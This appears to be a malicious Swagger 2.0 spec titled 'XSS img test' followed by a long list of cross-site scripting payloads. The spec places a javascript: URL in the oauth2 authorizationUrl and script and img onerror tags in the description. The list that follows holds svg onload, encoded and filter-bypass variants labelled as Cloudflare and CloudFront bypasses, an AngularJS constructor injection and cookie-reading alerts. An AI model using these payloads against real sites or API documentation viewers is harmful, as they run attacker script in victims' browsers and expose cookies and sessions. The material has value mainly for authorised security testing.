swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description: <script> onload = alert('1') </script> <img src=https://pbs.twimg.com/profile_images/1489293302541303816/J6VoQDMY_400x400.jpg onclick="alert(2)" onerror="alert(3)">
  

'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
"><svg/onload=alert(document.cookie)>"@x.y
`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>


<Svg Only=1 OnLoad =confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>




6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/;window/*aabb*/['al'%2b'ert'](document./*aabb*/Location);">%0D%0A%0D%0A<x'="foo"><x foo='><img scr=x onerror=javascript:alert(cloudfrontbypass)//>

<svg onload='new Function*["Y000!"].find(al\u0065rt)*'>




"><svg/onload=alert(document.cookie)>"@x.y


'"><svg><animate onbeing=alert('hacked')attributeName=x></svg>

<a href="javascript:alert('hacked')>www.example.com</a>

<IFRAME SRC="javascript:alert('hacked');"></IFRAME

<div ng-app> <strong class="ng-init:constructor.constructor('alert('hacked')')()">aaa</strong></div>

<<TexTArEa/*%00//%00*/a="/*%00///AutOFocUs//onFoCUS=alert'hacked'//
